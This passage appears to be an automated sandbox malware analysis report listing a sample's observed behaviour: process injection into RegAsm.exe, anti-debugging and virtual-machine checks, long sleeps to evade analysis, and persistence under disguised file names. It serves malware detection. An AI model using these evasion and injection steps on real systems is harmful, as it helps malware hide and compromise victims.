        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeWindow / User API: threadDelayed 6998
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 475
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 523
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 593
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: foregroundWindowGot 770
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batWindow / User API: threadDelayed 603
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeWindow / User API: threadDelayed 6998
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 475
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 523
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 593
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: foregroundWindowGot 770
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batWindow / User API: threadDelayed 603
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060Thread sleep count: 6998 > 30
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060Thread sleep time: -69980s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6256Thread sleep time: -100000s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 6980Thread sleep count: 603 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4344Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060Thread sleep count: 6998 > 30
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060Thread sleep time: -69980s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6256Thread sleep time: -100000s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 6980Thread sleep count: 603 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4344Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeThread sleep count: Count: 6998 delay: -10
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeThread sleep count: Count: 6998 delay: -10
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C93C FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C93C FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EC93C FindFirstFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EBF27 FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A341FD BlockInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A341FD BlockInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EA364 SetUnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EA364 SetUnhandledExceptionFilter,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009AA364 SetUnhandledExceptionFilter,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write
        Contains functionality to inject code into remote processesShow sources
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 7F3008
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 7F3008
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18C93 LogonUserW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18C93 LogonUserW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24EF5 mouse_event,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24EF5 mouse_event,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
